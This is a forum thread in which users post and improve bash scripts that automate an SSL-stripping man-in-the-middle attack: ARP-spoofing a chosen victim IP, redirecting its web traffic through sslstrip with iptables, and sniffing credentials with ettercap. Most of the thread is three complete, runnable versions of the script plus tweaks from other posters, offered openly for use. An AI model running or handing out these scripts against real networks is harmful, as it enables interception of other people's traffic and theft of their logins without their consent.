Results 1 to 9 of 9

Thread: SSL sniffing script

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    1

    Default SSL sniffing script

    I made a script for SSL sniffing as per g0tmilk's howto here: forums.remote-exploit.org/backtrack-4-howto/24426-video-tutorial-how-crack-snifff-ssl-https-sslstrip.html#post141532 .

    I'm not new to linux, but new to BackTrack. This is the first shell script that I ever made. Feedback would be GREATLY appreciated.

    Note: To use properly, you first have to uncoment 2 lines in /etc/etter.conf (the redir_command_on and redir_command_off lines for iptables).

    Code:
    #!/bin/bash
    clear
    echo "Hello $USER!"
    echo "Welcome to the SSL sniffing script"
    clear
    echo "What's the interface you'll be using? [eth0]"
    read iface
    if [ "$iface" = "" ]
    then
    iface="eth0"
    fi
    clear
    echo "What's the target's IP?"
    read tip
    clear
    echo "What's the target's gateway? [192.168.1.1]"
    read tdg
    if [ "$tdg" = "" ]
    then
    tdg="192.168.1.1"
    fi
    clear
    echo "The selected interface is $iface"
    echo "The target IP is $tip"
    echo "The target gateway is $tdg"
    echo "I'm ready to run the script."
    echo "Are you sure you want to run it [y/n]?"
    read yn
    if [ "$yn" != "y" ]
    then
    echo "Exiting..."
    echo "Have a nice day :)"
    exit 0
    fi
    clear
    echo "Running..."
    echo 1 > /proc/sys/net/ipv4/ip_forward
    konsole -e arpspoof -i $iface -t $tip $tdg &
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    konsole -e  sslstrip -a -k -f &
    clear
    echo "Running ettercap"
    ettercap -T -q -i $iface
    clear
    echo "All cleaned up."
    echo "Have a nice day :)"
    Hope this helps!

  2. #2
    Junior Member Deadboy's Avatar
    Join Date
    May 2009
    Location
    Louisiana
    Posts
    39

    Default

    nicely done. thanks!
    "Why is it drug addicts and computer afficionados are both called users? "

  3. #3
    Member floyd's Avatar
    Join Date
    Mar 2009
    Posts
    231

    Default

    remove at least the
    Code:
    echo "All cleaned up."
    because the system isn't cleaned up, you still have ip_forwarding enabled

    haven't tried the script
    Auswaertsspiel

  4. #4
    Just burned his ISO
    Join Date
    May 2009
    Posts
    11

    Default nice script

    But you don't have to uncomment the 2 lines!!!!
    then you would have ettercap forwarding the packets!!!
    When you uncomment the forwarding of ettercap then ettercap disables the ip forwarding of the kernel (it is in the manual) ...
    Ok? and don't forget to run ettercap in unoffensive mode ( -u arg)....

    Very good script by the way!!!

  5. #5
    Senior Member Nick_the_Greek's Avatar
    Join Date
    Jan 2010
    Location
    Greece
    Posts
    181

    Default

    Well done Jimmy Kane

    Keep scripting and sharing

    BTW Welcome to the forums

    Nick

  6. #6
    Just burned his ISO thims's Avatar
    Join Date
    Nov 2009
    Posts
    5

    Default

    @davos1: Very nice script man, keep up the good work, and contributing.
    You most likely chose "konsole" so it launches those in there own terminals so you can view output, but just sort of a note(you might already know about it) but the nohup command could be used in place of konsole for use if you were not running a graphical environment.

    I would like to contribute the script I use for SSL sniffing, with contributing this I am not trying to start a "competition" or anything simply sharing open source code, in the mentality of open source.(lets all share and improve each others code) There are some issues I plan to address with this script, and many improvements I want to address. In the current state it executes correctly and is capable of grabbing the appropriate data. Please let me know of *any* issues you have with it, ideas, improvements, etc.All feedback is constructive feedback.

    General usage: sslsniff.sh -v <ip of target> -g <network gateway>
    -v, and -g, are required however -s is optional, if excluded sslsniff defaults to port 10000.
    Also note still required to edit etter.conf manually(plan to change that in the future)
    Code:
    #!/bin/bash
    #
    # Synopsis: A program to sniff traffic in an SSL connection
    # Author:   thims (thims DOT local AT gmail DOT com)
    # Version:  0.2
    # Date:     20091107
    # Comments: 
    #   ToDO:
    #         - Create section that edits iptables rules in /etc/etter.conf   
    
    
    # leave blank simply here for coding style
    victim=
    gateway=
    sslPort=10000
    
    # print help
    function help() {
    cat << EOF
    Usage: $0 [args] host
        -h, --help     -  Print this help and exit
        -v, --victim   -  IP address of desired host
        -g, --gateway  -  IP address of network gateway
        -s, --sslport  -  Desired port for sslstrip
    EOF
    }
    
    # echo supplied argument and die
    function die() {
      if [ -n "$1" ] ;then
        echo "$1"
      fi  
      exit 1
    }
    
    # nohup wrapper to check if specified program will execute correctly
    function noHup() {
      cmd="$1"
      nohup $cmd > /dev/null &> /dev/null &
      sleep 5
      # here simply to handle sslstrip because it is ran by python it throws off pidof
      if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then
        pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
      else
        pid=$(pidof $(echo "$1" | awk -F" " '{print $1}'))
      fi  
    
      if [ -z "$pid" ] ;then
        return 1
      else
        return 0
      fi  
    }
    
    # poison the arp
    function spoofMac() {
      echo -n "Poisoning the victim...."
      noHup "arpspoof -t "$victim" "$gateway""
      if [ $? -gt 0 ] ;then
        die "Error: could not initiate arpspoof. Dieing..."
      fi  
      echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run
      echo "Ok"
    }
    
    # intercept the SSL cert
    function sslInit() {
      echo -n "Setting up SSL intercept...."
      echo 1 > /proc/sys/net/ipv4/ip_forward
      iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
      noHup "sslstrip -a -f -k -l "$sslPort""
      if [ $? -gt 0 ] ;then
        die "Error: could not initiate sslstrip. Dieing..."
      fi  
      echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run
      echo "Ok"
    }
    
    # capture the responses
    function capture() {
      echo -n "Starting to sniff...."
      ettercap -T -q
    }
    
    # clean up enviroment
    function cleanUp() {
      echo "Cleaning up...."
      echo -n "Closing SSL proxy...."
      kill $(cat /var/run/sslsniff.sslstrip.run)
      rm /var/run/sslsniff.sslstrip.run
      echo "Ok"
      echo -n "Unpoisoning the victim...."
      kill  -n 2 $(cat /var/run/sslsniff.arpspoof.run)
      rm /var/run/sslsniff.arpspoof.run
      echo "Ok"
      echo -n "Removing iptables rule and ip_forwarding...."
      iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
      echo 0 > /proc/sys/net/ipv4/ip_forward
      echo "Ok"
      echo "Have a nice day!"
    }
    
    # initialize the whole shebang
    function initialize() {
      if [ -z "$victim" ] || [ -z "$gateway" ] ;then
        help
        echo
        die "Error: a syntactical one"
      else
        spoofMac
        sslInit
        capture
        cleanUp
      fi
    }
    
    
    # some CLI ARGS?
    while [ $1 -gt 0 ]
    do
      case "$1" in
        "-h"|"--help")
          help
          die
        ;;
        "-v"|"--victim")
          victim="$2"
        ;;
        "-g"|"--gw")
          gateway="$2"
        ;;
        "-s"|"--sslport")
          sslPort="$1"
        ;;
        '')
          help
          echo
          die "Error: a syntactical one"
        ;;
        -*)
          help
          echo
          die "Error: a syntactical one"
        ;;
      esac
      shift
    done
    
    
    # main loop

  7. #7
    Senior Member Nick_the_Greek's Avatar
    Join Date
    Jan 2010
    Location
    Greece
    Posts
    181

    Default

    thims,

    Very nice script.

    I already got some ideas from it. I love this one:
    pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
    ...lets all share and improve each others code....
    100% agree. After all linux is sharing.

    with contributing this I am not trying to start a "competition" or anything
    Why don't you start a new post? It may be consider this as a hijacking.(?) Don't know.

    One idea from me is to upload it to mediafire or whatever so we don't have to come here every-time and copy-paste etc.

    Keep scripting and sharing.

    (Please don't get bored soon.I personally keep my eyes on your scripts.)

    Nick

  8. #8
    Just burned his ISO
    Join Date
    May 2009
    Posts
    11

    Default A little more improvement!!!

    A little more improvement
    - taking the -i or --iface argument for choosing the interface cause arpspoof wont work if you don't run with the -i arg ....
    - Printing the details of your configuration and i have put a small cat /proc/sys/net/ipv4/ip_forward due to reasons that sometimes echo 1 > /proc/sys/net/ipv4/ip_forward wont work ( i don't know why )

    Code:
    #!/bin/bash
    #
    # Synopsis: A program to sniff traffic in an SSL connection
    # Author:   thims (thims DOT local AT gmail DOT com)
    # Version:  0.2
    # Date:     20091107
    # Comments: 
    #   ToDO:
    #         - Create section that edits iptables rules in /etc/etter.conf   
    
    
    # leave blank simply here for coding style
    victim=
    gateway=
    sslPort=10000
    
    # print help
    function help() {
    cat << EOF
    Usage: $0 [args] host
        -h, --help     -  Print this help and exit
        -i, --iface    -  Select the interface
        -v, --victim   -  IP address of desired host
        -g, --gateway  -  IP address of network gateway
        -s, --sslport  -  Desired port for sslstrip
    EOF
    }
    
    # echo supplied argument and die
    function die() {
      if [ -n "$1" ] ;then
        echo "$1"
      fi  
      exit 1
    }
    
    # nohup wrapper to check if specified program will execute correctly
    function noHup() {
      cmd="$1"
      nohup $cmd > /dev/null &> /dev/null &
      sleep 5
      # here simply to handle sslstrip because it is ran by python it throws off pidof
      if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then
        pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
      else
        pid=$(pidof $(echo "$1" | awk -F" " '{print $1}'))
      fi  
    
      if [ -z "$pid" ] ;then
        return 1
      else
        return 0
      fi  
    }
    
    # poison the arp
    function spoofMac() {
      echo -n "Poisoning the victim...."
      noHup "arpspoof -i "$iface" -t "$victim" "$gateway""
      if [ $? -gt 0 ] ;then
        die "Error: could not initiate arpspoof. Dieing..."
      fi  
      echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run
      echo  "Ok"
    }
    
    # intercept the SSL cert
    function sslInit() {
      echo -n "Setting up SSL intercept...."
      echo "1" > /proc/sys/net/ipv4/ip_forward
      iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
      noHup "sslstrip -a -f -k -l "$sslPort""
      if [ $? -gt 0 ] ;then
        die "Error: could not initiate sslstrip. Dieing..."
      fi  
      echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run
      cat -n "Forwarding:" /proc/sys/net/ipv4/ip_forward
      echo "Ok"
    }
    
    # capture the responses
    function capture() {
      echo -n "Starting to sniff...."
      ettercap -T -q -i "$iface"
    }
    
    # clean up enviroment
    function cleanUp() {
      echo "Cleaning up...."
      echo -n "Closing SSL proxy...."
      kill $(cat /var/run/sslsniff.sslstrip.run)
      rm /var/run/sslsniff.sslstrip.run
      echo "Ok"
      echo -n "Unpoisoning the victim...."
      kill  -n 2 $(cat /var/run/sslsniff.arpspoof.run)
      rm /var/run/sslsniff.arpspoof.run
      echo "Ok"
      echo -n "Removing iptables rule and ip_forwarding...."
      iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
      echo 0 > /proc/sys/net/ipv4/ip_forward
      echo "Ok"
      echo "Have a nice day!"
    }
    
    # initialize the whole shebang
    function initialize() {
      if [ -z "$victim" ] || [ -z "$gateway" ] || [ -z "$iface" ];then
        help
        echo
        die "Error: a syntactical one1"
      else
        echo "Victim:         " "$victim" "  Ok!"
        echo "Gateway/Router: " "$gateway" "  OK!"
        echo "Interface:          " "$iface" "    OK!"
        echo "SSLStrip on:       "	"$sslPort" "     OK!"
        spoofMac
        sslInit
        capture
        cleanUp
      fi
    }
    
    
    # some CLI ARGS?
    while [ $# -gt 0 ]
    do
      case "$1" in
        "-h"|"--help")
          help
          die
        ;;
        "-v"|"--victim")
          victim="$2"
        ;;
        "-g"|"--gw")
          gateway="$2"
        ;;
        "-s"|"--sslport")
          sslPort="$1"
        ;;
        "-i"|"--iface")
          iface="$2"
        ;;
        '')
          help
          echo
          die "Error: a syntactical one"
        ;;
        -*)
          help
          echo
          die "Error: a syntactical one"
        ;;
      esac
      shift
    done
    
    
    # main loop
    initialize
    Greeting's
    [I]"Everything that is communication comes from ... quartz crystals..." [/I]

  9. #9
    Just burned his ISO thims's Avatar
    Join Date
    Nov 2009
    Posts
    5

    Default

    @nick_the_greek: thank you, I would like to think bash one-liners is my specialty(maybe just my interest, /me shrugs). Yeah I thought about posting a new thread, but at the time I couldnt being a new account, and I debated whether it would be a duplicate thread or a hijacking. I will probably create a new thread because I have made some changes already and incorporated a few new nice features. Also I just created a mediafire account good call. I will keep sharing, have any suggestions? all suggestions are def. welcome.

    @jimmy Kane: Thank you, nice suggestions btw, I saw your email was just procrastinating a bit. I added the iface option and am looking into the ip_forward issue, I havent quite got a replica of the issue yet, care to provide more details on it? I might just end up adding some error correction for when it sets up the ip_forward.

    Note: when I create the new thread I will link to it from this post.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •